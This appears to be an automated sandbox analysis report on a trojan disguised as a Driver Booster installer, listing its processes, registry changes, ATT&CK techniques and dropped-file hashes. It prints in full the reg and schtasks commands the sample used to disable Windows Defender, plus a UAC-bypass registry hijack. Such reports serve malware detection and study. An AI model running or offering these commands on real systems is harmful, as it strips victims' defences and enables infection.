71273ccf9881c6a687023fa1c40df85278346d3229307aee6cea6e7f6910925e

Analysis

max time kernel
154s
max time network
144s
platform
windows10-2004_x64
resource
win10v2004-20220414-en
submitted
11-05-2022 23:08

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

71273ccf9881c6a687023fa1c40df85278346d3229307aee6cea6e7f6910925e.exe
Size

23.9MB
MD5

6ca4fb6e640d6da6066f5862cc79b09f
SHA1

b23f145e90da334b176b4f6a55e948f2cff48a77
SHA256

71273ccf9881c6a687023fa1c40df85278346d3229307aee6cea6e7f6910925e
SHA512

6d0578e4d44bc4652dddaa5c7a2bc4c02cc9d82832946824222a659898ac486d3dbaa8e25e979d258fd0e722a56e38b5279ef2b50227b73d1aa51a805a9f80eb

Score

10^/10

evasion trojan

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
Modifies security service 2 TTPs 1 IoCs
evasion

Modify Registry
T1112

Modify Existing Service
T1031

Processes:

reg.exe

description ioc process

Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" reg.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4"	reg.exe

Executes dropped EXE 8 IoCs

Processes:

71273ccf9881c6a687023fa1c40df85278346d3229307aee6cea6e7f6910925e.tmpDriver.Booster.7.5.0.751.exeDriver.Booster.7.5.0.751.tmp7z.exe7z.exe7z.exe7z.exe909.exe

pid	process
3128	71273ccf9881c6a687023fa1c40df85278346d3229307aee6cea6e7f6910925e.tmp
1728	Driver.Booster.7.5.0.751.exe
1304	Driver.Booster.7.5.0.751.tmp
3452	7z.exe
4636	7z.exe
3872	7z.exe
1552	7z.exe
1160	909.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

71273ccf9881c6a687023fa1c40df85278346d3229307aee6cea6e7f6910925e.tmpWScript.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\Control Panel\International\Geo\Nation	71273ccf9881c6a687023fa1c40df85278346d3229307aee6cea6e7f6910925e.tmp
Key value queried	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\Control Panel\International\Geo\Nation	WScript.exe

Loads dropped DLL 10 IoCs

Processes:

71273ccf9881c6a687023fa1c40df85278346d3229307aee6cea6e7f6910925e.tmpDriver.Booster.7.5.0.751.tmp7z.exe7z.exe7z.exe7z.exe909.exe

pid	process
3128	71273ccf9881c6a687023fa1c40df85278346d3229307aee6cea6e7f6910925e.tmp
1304	Driver.Booster.7.5.0.751.tmp
1304	Driver.Booster.7.5.0.751.tmp
1304	Driver.Booster.7.5.0.751.tmp
1304	Driver.Booster.7.5.0.751.tmp
3452	7z.exe
4636	7z.exe
3872	7z.exe
1552	7z.exe
1160	909.exe

Drops file in Program Files directory 2 IoCs

Processes:

71273ccf9881c6a687023fa1c40df85278346d3229307aee6cea6e7f6910925e.tmp

description	ioc	process
File opened for modification	C:\Program Files (x86)\Driver.Booster.7.5.0.751.exe	71273ccf9881c6a687023fa1c40df85278346d3229307aee6cea6e7f6910925e.tmp
File created	C:\Program Files (x86)\is-2PC3H.tmp	71273ccf9881c6a687023fa1c40df85278346d3229307aee6cea6e7f6910925e.tmp

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

3268 timeout.exe

pid	process
3268	timeout.exe

Modifies registry class 8 IoCs

Processes:

reg.exe71273ccf9881c6a687023fa1c40df85278346d3229307aee6cea6e7f6910925e.tmpreg.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings\shell\open\command	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings\shell\open\command\DelegateExecute = " "	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\Local Settings	71273ccf9881c6a687023fa1c40df85278346d3229307aee6cea6e7f6910925e.tmp
Key created	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings\shell\open\command	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings\shell	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings\shell\open	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings\shell\open\command\ = "C:\\windows\\SysWow64\\cmd.exe /c REG ADD HKLM\\software\\microsoft\\windows\\currentversion\\policies\\system /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f"	reg.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

71273ccf9881c6a687023fa1c40df85278346d3229307aee6cea6e7f6910925e.tmpDriver.Booster.7.5.0.751.tmp

pid	process
3128	71273ccf9881c6a687023fa1c40df85278346d3229307aee6cea6e7f6910925e.tmp
3128	71273ccf9881c6a687023fa1c40df85278346d3229307aee6cea6e7f6910925e.tmp
1304	Driver.Booster.7.5.0.751.tmp
1304	Driver.Booster.7.5.0.751.tmp

Suspicious use of AdjustPrivilegeToken 17 IoCs

Processes:

7z.exe7z.exe7z.exe7z.exe909.exe

description	pid	process
Token: SeRestorePrivilege	3452	7z.exe
Token: 35	3452	7z.exe
Token: SeSecurityPrivilege	3452	7z.exe
Token: SeSecurityPrivilege	3452	7z.exe
Token: SeRestorePrivilege	4636	7z.exe
Token: 35	4636	7z.exe
Token: SeSecurityPrivilege	4636	7z.exe
Token: SeSecurityPrivilege	4636	7z.exe
Token: SeRestorePrivilege	3872	7z.exe
Token: 35	3872	7z.exe
Token: SeSecurityPrivilege	3872	7z.exe
Token: SeSecurityPrivilege	3872	7z.exe
Token: SeRestorePrivilege	1552	7z.exe
Token: 35	1552	7z.exe
Token: SeSecurityPrivilege	1552	7z.exe
Token: SeSecurityPrivilege	1552	7z.exe
Token: SeDebugPrivilege	1160	909.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

71273ccf9881c6a687023fa1c40df85278346d3229307aee6cea6e7f6910925e.tmp

pid process

3128 71273ccf9881c6a687023fa1c40df85278346d3229307aee6cea6e7f6910925e.tmp

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

71273ccf9881c6a687023fa1c40df85278346d3229307aee6cea6e7f6910925e.exe71273ccf9881c6a687023fa1c40df85278346d3229307aee6cea6e7f6910925e.tmpDriver.Booster.7.5.0.751.exeWScript.execmd.execmd.execmd.exe

description	pid	process	target process
PID 4592 wrote to memory of 3128	4592	71273ccf9881c6a687023fa1c40df85278346d3229307aee6cea6e7f6910925e.exe	71273ccf9881c6a687023fa1c40df85278346d3229307aee6cea6e7f6910925e.tmp
PID 4592 wrote to memory of 3128	4592	71273ccf9881c6a687023fa1c40df85278346d3229307aee6cea6e7f6910925e.exe	71273ccf9881c6a687023fa1c40df85278346d3229307aee6cea6e7f6910925e.tmp
PID 4592 wrote to memory of 3128	4592	71273ccf9881c6a687023fa1c40df85278346d3229307aee6cea6e7f6910925e.exe	71273ccf9881c6a687023fa1c40df85278346d3229307aee6cea6e7f6910925e.tmp
PID 3128 wrote to memory of 1728	3128	71273ccf9881c6a687023fa1c40df85278346d3229307aee6cea6e7f6910925e.tmp	Driver.Booster.7.5.0.751.exe
PID 3128 wrote to memory of 1728	3128	71273ccf9881c6a687023fa1c40df85278346d3229307aee6cea6e7f6910925e.tmp	Driver.Booster.7.5.0.751.exe
PID 3128 wrote to memory of 1728	3128	71273ccf9881c6a687023fa1c40df85278346d3229307aee6cea6e7f6910925e.tmp	Driver.Booster.7.5.0.751.exe
PID 1728 wrote to memory of 1304	1728	Driver.Booster.7.5.0.751.exe	Driver.Booster.7.5.0.751.tmp
PID 1728 wrote to memory of 1304	1728	Driver.Booster.7.5.0.751.exe	Driver.Booster.7.5.0.751.tmp
PID 1728 wrote to memory of 1304	1728	Driver.Booster.7.5.0.751.exe	Driver.Booster.7.5.0.751.tmp
PID 3128 wrote to memory of 1176	3128	71273ccf9881c6a687023fa1c40df85278346d3229307aee6cea6e7f6910925e.tmp	WScript.exe
PID 3128 wrote to memory of 1176	3128	71273ccf9881c6a687023fa1c40df85278346d3229307aee6cea6e7f6910925e.tmp	WScript.exe
PID 3128 wrote to memory of 1176	3128	71273ccf9881c6a687023fa1c40df85278346d3229307aee6cea6e7f6910925e.tmp	WScript.exe
PID 1176 wrote to memory of 3756	1176	WScript.exe	cmd.exe
PID 1176 wrote to memory of 3756	1176	WScript.exe	cmd.exe
PID 1176 wrote to memory of 3756	1176	WScript.exe	cmd.exe
PID 1176 wrote to memory of 4040	1176	WScript.exe	cmd.exe
PID 1176 wrote to memory of 4040	1176	WScript.exe	cmd.exe
PID 1176 wrote to memory of 4040	1176	WScript.exe	cmd.exe
PID 1176 wrote to memory of 4000	1176	WScript.exe	cmd.exe
PID 1176 wrote to memory of 4000	1176	WScript.exe	cmd.exe
PID 1176 wrote to memory of 4000	1176	WScript.exe	cmd.exe
PID 1176 wrote to memory of 1820	1176	WScript.exe	cmd.exe
PID 1176 wrote to memory of 1820	1176	WScript.exe	cmd.exe
PID 1176 wrote to memory of 1820	1176	WScript.exe	cmd.exe
PID 1820 wrote to memory of 3268	1820	cmd.exe	timeout.exe
PID 1820 wrote to memory of 3268	1820	cmd.exe	timeout.exe
PID 1820 wrote to memory of 3268	1820	cmd.exe	timeout.exe
PID 3756 wrote to memory of 1132	3756	cmd.exe	reg.exe
PID 3756 wrote to memory of 1132	3756	cmd.exe	reg.exe
PID 3756 wrote to memory of 1132	3756	cmd.exe	reg.exe
PID 4040 wrote to memory of 760	4040	cmd.exe	reg.exe
PID 4040 wrote to memory of 760	4040	cmd.exe	reg.exe
PID 4040 wrote to memory of 760	4040	cmd.exe	reg.exe
PID 4040 wrote to memory of 4356	4040	cmd.exe	reg.exe
PID 4040 wrote to memory of 4356	4040	cmd.exe	reg.exe
PID 4040 wrote to memory of 4356	4040	cmd.exe	reg.exe
PID 3756 wrote to memory of 1760	3756	cmd.exe	reg.exe
PID 3756 wrote to memory of 1760	3756	cmd.exe	reg.exe
PID 3756 wrote to memory of 1760	3756	cmd.exe	reg.exe
PID 3756 wrote to memory of 2236	3756	cmd.exe	reg.exe
PID 3756 wrote to memory of 2236	3756	cmd.exe	reg.exe
PID 3756 wrote to memory of 2236	3756	cmd.exe	reg.exe
PID 3756 wrote to memory of 1544	3756	cmd.exe	reg.exe
PID 3756 wrote to memory of 1544	3756	cmd.exe	reg.exe
PID 3756 wrote to memory of 1544	3756	cmd.exe	reg.exe
PID 3756 wrote to memory of 2616	3756	cmd.exe	reg.exe
PID 3756 wrote to memory of 2616	3756	cmd.exe	reg.exe
PID 3756 wrote to memory of 2616	3756	cmd.exe	reg.exe
PID 3756 wrote to memory of 5064	3756	cmd.exe	reg.exe
PID 3756 wrote to memory of 5064	3756	cmd.exe	reg.exe
PID 3756 wrote to memory of 5064	3756	cmd.exe	reg.exe
PID 3756 wrote to memory of 4332	3756	cmd.exe	reg.exe
PID 3756 wrote to memory of 4332	3756	cmd.exe	reg.exe
PID 3756 wrote to memory of 4332	3756	cmd.exe	reg.exe
PID 3756 wrote to memory of 460	3756	cmd.exe	reg.exe
PID 3756 wrote to memory of 460	3756	cmd.exe	reg.exe
PID 3756 wrote to memory of 460	3756	cmd.exe	reg.exe
PID 3756 wrote to memory of 1008	3756	cmd.exe	reg.exe
PID 3756 wrote to memory of 1008	3756	cmd.exe	reg.exe
PID 3756 wrote to memory of 1008	3756	cmd.exe	reg.exe
PID 3756 wrote to memory of 1664	3756	cmd.exe	reg.exe
PID 3756 wrote to memory of 1664	3756	cmd.exe	reg.exe
PID 3756 wrote to memory of 1664	3756	cmd.exe	reg.exe
PID 3756 wrote to memory of 3992	3756	cmd.exe	reg.exe

C:\Users\Admin\AppData\Local\Temp\71273ccf9881c6a687023fa1c40df85278346d3229307aee6cea6e7f6910925e.exe
"C:\Users\Admin\AppData\Local\Temp\71273ccf9881c6a687023fa1c40df85278346d3229307aee6cea6e7f6910925e.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4592

C:\Users\Admin\AppData\Local\Temp\is-QPI2M.tmp\71273ccf9881c6a687023fa1c40df85278346d3229307aee6cea6e7f6910925e.tmp
"C:\Users\Admin\AppData\Local\Temp\is-QPI2M.tmp\71273ccf9881c6a687023fa1c40df85278346d3229307aee6cea6e7f6910925e.tmp" /SL5="$A01D2,24401727,731648,C:\Users\Admin\AppData\Local\Temp\71273ccf9881c6a687023fa1c40df85278346d3229307aee6cea6e7f6910925e.exe"
2⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Drops file in Program Files directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:3128

C:\Program Files (x86)\Driver.Booster.7.5.0.751.exe
"C:\Program Files (x86)\Driver.Booster.7.5.0.751.exe"
3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1728

C:\Users\Admin\AppData\Local\Temp\is-2OC32.tmp\Driver.Booster.7.5.0.751.tmp
"C:\Users\Admin\AppData\Local\Temp\is-2OC32.tmp\Driver.Booster.7.5.0.751.tmp" /SL5="$A004A,19672100,361472,C:\Program Files (x86)\Driver.Booster.7.5.0.751.exe"
4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:1304

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\ProgramData\dwEY\MMF.vbs"
3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1176

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\ProgramData\dwEY\DisableOAVProtection.bat" "
4⤵
- Suspicious use of WriteProcessMemory
PID:3756

C:\Windows\SysWOW64\reg.exe
reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
5⤵
PID:1132

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
5⤵
PID:1760

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
5⤵
PID:2236

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
5⤵
PID:1544

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
5⤵
PID:2616

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
5⤵
PID:5064

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
5⤵
PID:4332

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
5⤵
PID:460

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
5⤵
PID:1008

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
5⤵
PID:1664

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
5⤵
PID:3992

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
5⤵
PID:4952

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
5⤵
PID:4552

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
5⤵
PID:1668

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
5⤵
PID:1936

C:\Windows\SysWOW64\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
5⤵
PID:3348

C:\Windows\SysWOW64\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
5⤵
PID:4020

C:\Windows\SysWOW64\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
5⤵
PID:1432

C:\Windows\SysWOW64\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
5⤵
PID:2948

C:\Windows\SysWOW64\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
5⤵
PID:1696

C:\Windows\SysWOW64\reg.exe
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
5⤵
PID:1592

C:\Windows\SysWOW64\reg.exe
reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
5⤵
PID:2772

C:\Windows\SysWOW64\reg.exe
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
5⤵
PID:2660

C:\Windows\SysWOW64\reg.exe
reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
5⤵
PID:1012

C:\Windows\SysWOW64\reg.exe
reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
5⤵
PID:2308

C:\Windows\SysWOW64\reg.exe
reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
5⤵
PID:4784

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
5⤵
PID:2056

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
5⤵
PID:1976

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
5⤵
PID:1156

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
5⤵
PID:4412

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
5⤵
- Modifies security service
PID:3260

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
5⤵
PID:3840

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\ProgramData\dwEY\DisableUserAccountControl.bat" "
4⤵
- Suspicious use of WriteProcessMemory
PID:4040

C:\Windows\SysWOW64\reg.exe
REG ADD "HKCU\SOFTWARE\Classes\ms-settings\shell\open\command" /t REG_SZ /d "C:\windows\system32\cmd.exe /c REG ADD HKLM\software\microsoft\windows\currentversion\policies\system /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f" /f
5⤵
- Modifies registry class
PID:760

C:\Windows\SysWOW64\reg.exe
REG ADD "hkcu\software\classes\ms-settings\shell\open\command" /v DelegateExecute /t REG_SZ /d " " /f
5⤵
- Modifies registry class
PID:4356

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\ProgramData\dwEY\main.bat" "
4⤵
PID:4000

C:\Windows\SysWOW64\mode.com
mode 65,10
5⤵
PID:3184

C:\ProgramData\dwEY\7z.exe
7z.exe e file.zip -p___________1241pwd8489pwd12342___________ -oextracted
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:3452

C:\ProgramData\dwEY\7z.exe
7z.exe e extracted/file_3.zip -oextracted
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:4636

C:\ProgramData\dwEY\7z.exe
7z.exe e extracted/file_2.zip -oextracted
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:3872

C:\ProgramData\dwEY\7z.exe
7z.exe e extracted/file_1.zip -oextracted
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:1552

C:\ProgramData\dwEY\909.exe
"909.exe"
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:1160

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\ProgramData\dwEY\DiskRemoval.bat" "
4⤵
- Suspicious use of WriteProcessMemory
PID:1820

C:\Windows\SysWOW64\timeout.exe
timeout /T 60 /NOBREAK
5⤵
- Delays execution with timeout.exe
PID:3268

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Disabling Security Tools

T1089

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\Driver.Booster.7.5.0.751.exe
Filesize
19.1MB

MD5
8f338d9c273f69e1945a1199857f8344

SHA1
8e91bb8cafa23d1a7791bb7861b12904bb85d24e

SHA256
48052f534ffb591a0a70e45aced6fa54451553bc84421f2eabd630e076d7acf1

SHA512
2c81eb3caecd0d0a8d4711471bb56e7372e101b8ff2792af6df2327e7a0fef35799ed1e820e631b9cfd5c9562982b05e6e97b06ac86276c30bd7951eac453bdc

Download Submit
C:\Program Files (x86)\Driver.Booster.7.5.0.751.exe
Filesize
19.1MB

MD5
8f338d9c273f69e1945a1199857f8344

SHA1
8e91bb8cafa23d1a7791bb7861b12904bb85d24e

SHA256
48052f534ffb591a0a70e45aced6fa54451553bc84421f2eabd630e076d7acf1

SHA512
2c81eb3caecd0d0a8d4711471bb56e7372e101b8ff2792af6df2327e7a0fef35799ed1e820e631b9cfd5c9562982b05e6e97b06ac86276c30bd7951eac453bdc

Download Submit
C:\ProgramData\dwEY\7z.dll
Filesize
1.6MB

MD5
72491c7b87a7c2dd350b727444f13bb4

SHA1
1e9338d56db7ded386878eab7bb44b8934ab1bc7

SHA256
34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

SHA512
583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

Download Submit
C:\ProgramData\dwEY\7z.dll
Filesize
1.6MB

MD5
72491c7b87a7c2dd350b727444f13bb4

SHA1
1e9338d56db7ded386878eab7bb44b8934ab1bc7

SHA256
34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

SHA512
583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

Download Submit
C:\ProgramData\dwEY\7z.dll
Filesize
1.6MB

MD5
72491c7b87a7c2dd350b727444f13bb4

SHA1
1e9338d56db7ded386878eab7bb44b8934ab1bc7

SHA256
34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

SHA512
583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

Download Submit
C:\ProgramData\dwEY\7z.dll
Filesize
1.6MB

MD5
72491c7b87a7c2dd350b727444f13bb4

SHA1
1e9338d56db7ded386878eab7bb44b8934ab1bc7

SHA256
34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

SHA512
583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

Download Submit
C:\ProgramData\dwEY\7z.dll
Filesize
1.6MB

MD5
72491c7b87a7c2dd350b727444f13bb4

SHA1
1e9338d56db7ded386878eab7bb44b8934ab1bc7

SHA256
34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

SHA512
583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

Download Submit
C:\ProgramData\dwEY\7z.exe
Filesize
458KB

MD5
619f7135621b50fd1900ff24aade1524

SHA1
6c7ea8bbd435163ae3945cbef30ef6b9872a4591

SHA256
344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

SHA512
2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

Download Submit
C:\ProgramData\dwEY\7z.exe
Filesize
458KB

MD5
619f7135621b50fd1900ff24aade1524

SHA1
6c7ea8bbd435163ae3945cbef30ef6b9872a4591

SHA256
344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

SHA512
2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

Download Submit
C:\ProgramData\dwEY\7z.exe
Filesize
458KB

MD5
619f7135621b50fd1900ff24aade1524

SHA1
6c7ea8bbd435163ae3945cbef30ef6b9872a4591

SHA256
344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

SHA512
2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

Download Submit
C:\ProgramData\dwEY\7z.exe
Filesize
458KB

MD5
619f7135621b50fd1900ff24aade1524

SHA1
6c7ea8bbd435163ae3945cbef30ef6b9872a4591

SHA256
344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

SHA512
2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

Download Submit
C:\ProgramData\dwEY\7z.exe
Filesize
458KB

MD5
619f7135621b50fd1900ff24aade1524

SHA1
6c7ea8bbd435163ae3945cbef30ef6b9872a4591

SHA256
344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

SHA512
2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

Download Submit
C:\ProgramData\dwEY\909.exe
Filesize
2.5MB

MD5
0d48cb857d930b968876f0616fc175b1

SHA1
0d506c8ced881691e13bddd8dc822fb45b934ad2

SHA256
e1855703193393b22bd8a978dfe9428d6f357cb6773c5126d42a08b9faed33c3

SHA512
08e4bab8421a88a087e7882cc41546db3a2e9a5f4295ad469e878219573f8766210136a2e8910a8072105466b6c2e7636e97d7f6a4dc20153bef66e0adbbf5d4

Download Submit
C:\ProgramData\dwEY\DisableOAVProtection.bat
Filesize
105KB

MD5
687cc2fd21ae18a05a907e3f0b27411b

SHA1
7a5129c77d6721ea8c3aceab90c1b5576638d14b

SHA256
6d09ddc3211e2840fcbcb463a22daf52664ef5d0f7234bb39ebeaaf5a0b8e632

SHA512
a69138598acb78954b99f986afa08d69ebd607a79d2733cfb904473651b34ff10aa6a6a08704f0d0bafafd962af7093b510addf3d1909523a8e8884c505e3b59

Download Submit
C:\ProgramData\dwEY\DisableUserAccountControl.bat
Filesize
17KB

MD5
e02bb39aab8a10eba07f113d7a548f9c

SHA1
2dcd92059dea564ef18b7bdbc931623a566628da

SHA256
96deb3e68b5bc4bd430624fd5d79113d0fb018b0afc401380b4662b4f0d9c617

SHA512
4b908a5b1eef6c799c057299d3b6c70aa567962edf42f390d330a5c6c0c2fd00872708f7f3d56d4323f7773ad1c15e663798e08f7c309c219555ee656de49223

Download Submit
C:\ProgramData\dwEY\DiskRemoval.bat
Filesize
254B

MD5
8c3372370db3c9dc3198135ad3162d20

SHA1
a30bf13314631716719094e52fd6e132f442fdbf

SHA256
63c360cd9f78fc0753a498f45b86c377416881e5560ea3de7908051c93bc0931

SHA512
